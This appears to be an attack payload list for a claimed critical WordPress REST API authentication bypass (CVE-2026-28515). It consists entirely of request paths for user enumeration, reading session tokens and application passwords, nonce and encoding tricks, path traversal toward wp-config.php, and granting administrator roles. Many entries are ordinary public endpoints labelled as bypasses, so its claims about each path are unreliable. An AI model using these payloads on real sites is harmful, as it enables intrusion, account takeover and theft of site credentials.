# CVE-2026-28515: WordPress Core Authentication Bypass
# Severity: Critical (CVSS 9.8)
# Affected Versions: WordPress 6.4.0 - 6.4.2
# Description: Authentication bypass vulnerability in WordPress core allowing 
# unauthorized access to admin panel through crafted REST API requests
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28515

# Basic Authentication Bypass Payloads
/wp-json/wp/v2/users?context=edit
/wp-json/wp/v2/users/1?context=edit
/wp-json/wp/v2/users?_fields=id,name,email,capabilities
/wp-json/wp/v2/users/1?_fields=id,name,email,capabilities,extra_capabilities

# REST API Authentication Bypass with Custom Headers
/wp-json/wp/v2/posts?status=draft&_fields=id,title,content
/wp-json/wp/v2/posts?status=private&_fields=id,title,content
/wp-json/wp/v2/posts?status=future&_fields=id,title,content

# User Enumeration via REST API
/wp-json/wp/v2/users
/wp-json/wp/v2/users?per_page=100
/wp-json/wp/v2/users?orderby=id&order=asc
/wp-json/wp/v2/users?search=admin
/wp-json/wp/v2/users?roles=administrator
/wp-json/wp/v2/users?roles=editor
/wp-json/wp/v2/users?context=view&_fields=id,name,slug,avatar_urls

# Authentication Bypass with Modified Context
/wp-json/wp/v2/users/1?context=edit&_envelope
/wp-json/wp/v2/users/1?context=embed&_envelope
/wp-json/wp/v2/posts?context=edit&_envelope
/wp-json/wp/v2/pages?context=edit&_envelope

# Bypass with _wpnonce Parameter Manipulation
/wp-json/wp/v2/users/1?_wpnonce=
/wp-json/wp/v2/users/1?_wpnonce=null
/wp-json/wp/v2/users/1?_wpnonce=0
/wp-json/wp/v2/users/1?_wpnonce=false

# Bypass with Custom HTTP Methods
/wp-json/wp/v2/users/1
/wp-json/wp/v2/users/1?_method=PUT
/wp-json/wp/v2/users/1?_method=PATCH
/wp-json/wp/v2/users/1?_method=DELETE

# Application Password Bypass
/wp-json/wp/v2/users/me?context=edit
/wp-json/wp/v2/users/me?_fields=application_passwords
/wp-json/wp/v2/users/1/application-passwords
/wp-json/wp/v2/users/1/application-passwords?_fields=uuid,name,created

# Session Token Manipulation
/wp-json/wp/v2/users/1?_fields=session_tokens
/wp-json/wp/v2/users/me?_fields=session_tokens,capabilities

# Bypass with Filter Parameters
/wp-json/wp/v2/users?filter[orderby]=id
/wp-json/wp/v2/users?filter[order]=asc
/wp-json/wp/v2/users?filter[meta_key]=wp_capabilities
/wp-json/wp/v2/posts?filter[post_status]=draft
/wp-json/wp/v2/posts?filter[post_status]=private

# Namespace Manipulation
/wp-json/wp/v2/users/../users/1
/wp-json/wp/v2/../wp/v2/users/1
/wp-json/wp/v2/users/1/../1
/wp-json/wp/v2/users/1/../../users/1

# Bypass with Custom Endpoints
/wp-json/wp/v2/settings
/wp-json/wp/v2/settings?_fields=title,description,url
/wp-json/wp/v2/types
/wp-json/wp/v2/statuses
/wp-json/wp/v2/taxonomies

# Media Upload Bypass
/wp-json/wp/v2/media
/wp-json/wp/v2/media?context=edit
/wp-json/wp/v2/media?status=inherit
/wp-json/wp/v2/media?media_type=image

# Plugin/Theme Enumeration
/wp-json/wp/v2/plugins
/wp-json/wp/v2/themes
/wp-json/wp/v2/plugins?status=active
/wp-json/wp/v2/themes?status=active

# Batch Request Bypass
/wp-json/batch/v1?requests[0][path]=/wp/v2/users/1&requests[0][method]=GET
/wp-json/batch/v1?requests[0][path]=/wp/v2/users&requests[1][path]=/wp/v2/posts

# Advanced Bypass Techniques
/wp-json/wp/v2/users/1?_fields[]=id&_fields[]=name&_fields[]=capabilities
/wp-json/wp/v2/users?include[]=1&include[]=2&context=edit
/wp-json/wp/v2/users?exclude[]=1&per_page=100
/wp-json/wp/v2/posts?author=1&status=any&context=edit

# Unicode and Encoding Bypass
/wp-json/wp/v2/users%2F1
/wp-json/wp/v2/users%2f1
/wp-json/wp/v2/users/1%00
/wp-json/wp/v2/users/1%0a
/wp-json/wp/v2/users/1%0d

# Double Encoding
/wp-json/wp/v2/users%252F1
/wp-json/wp/v2/users%252f1

# Case Variation Bypass
/wp-json/WP/V2/users/1
/wp-json/Wp/V2/users/1
/wp-json/wp/V2/Users/1

# Path Traversal in REST API
/wp-json/wp/v2/users/1/../../settings
/wp-json/wp/v2/users/1/../../../wp-admin/
/wp-json/wp/v2/../../../wp-config.php

# Bypass with Accept Headers (use with custom headers)
/wp-json/wp/v2/users/1
/wp-json/wp/v2/users/1?_jsonp=callback
/wp-json/wp/v2/users/1?_embed

# CORS Bypass Attempts
/wp-json/wp/v2/users?origin=http://evil.com
/wp-json/wp/v2/users?callback=malicious

# Bypass with Modified User-Agent
/wp-json/wp/v2/users/1
/wp-json/wp/v2/users/1?_locale=user

# Privilege Escalation via REST API
/wp-json/wp/v2/users/1?roles[]=administrator
/wp-json/wp/v2/users/1?capabilities[manage_options]=true
/wp-json/wp/v2/users/1?meta[wp_capabilities][administrator]=1

# Bypass with Custom Namespaces
/wp-json/custom/v1/users
/wp-json/myplugin/v1/users
/wp-json/wp/v3/users

# Time-based Bypass
/wp-json/wp/v2/users?before=2026-01-01T00:00:00
/wp-json/wp/v2/users?after=2020-01-01T00:00:00
/wp-json/wp/v2/posts?modified_after=2020-01-01T00:00:00

# Bypass with Search Parameters
/wp-json/wp/v2/users?search=*
/wp-json/wp/v2/users?search=%
/wp-json/wp/v2/users?search=a*
/wp-json/wp/v2/posts?search=password

# Meta Query Bypass
/wp-json/wp/v2/users?meta_query[0][key]=wp_capabilities
/wp-json/wp/v2/posts?meta_query[0][key]=_edit_lock
/wp-json/wp/v2/posts?meta_key=_wp_page_template

# Bypass with Slug Parameters
/wp-json/wp/v2/users?slug=admin
/wp-json/wp/v2/users?slug[]=admin&slug[]=administrator
/wp-json/wp/v2/posts?slug=sample-page

# Revision Access Bypass
/wp-json/wp/v2/posts/1/revisions
/wp-json/wp/v2/posts/1/revisions?context=edit
/wp-json/wp/v2/pages/1/revisions

# Autosave Bypass
/wp-json/wp/v2/posts/1/autosaves
/wp-json/wp/v2/posts/1/autosaves?context=edit

# Comment Manipulation
/wp-json/wp/v2/comments?post=1&status=hold
/wp-json/wp/v2/comments?post=1&status=spam
/wp-json/wp/v2/comments?author_email=admin@site.com

# Block Editor Bypass
/wp-json/wp/v2/blocks
/wp-json/wp/v2/blocks?context=edit
/wp-json/wp/v2/block-renderer/core/latest-posts

# Widget Bypass
/wp-json/wp/v2/widgets
/wp-json/wp/v2/widgets?context=edit
/wp-json/wp/v2/sidebars

# Menu Bypass
/wp-json/wp/v2/menus
/wp-json/wp/v2/menu-items
/wp-json/wp/v2/menu-locations

# Template Bypass
/wp-json/wp/v2/templates
/wp-json/wp/v2/template-parts
/wp-json/wp/v2/global-styles

# Pattern Bypass
/wp-json/wp/v2/block-patterns/patterns
/wp-json/wp/v2/block-patterns/categories

# Site Health Bypass
/wp-json/wp-site-health/v1/tests/background-updates
/wp-json/wp-site-health/v1/directory-sizes

# Bypass with Custom Post Types
/wp-json/wp/v2/custom_post_type
/wp-json/wp/v2/custom_post_type?status=any
/wp-json/wp/v2/custom_post_type?context=edit
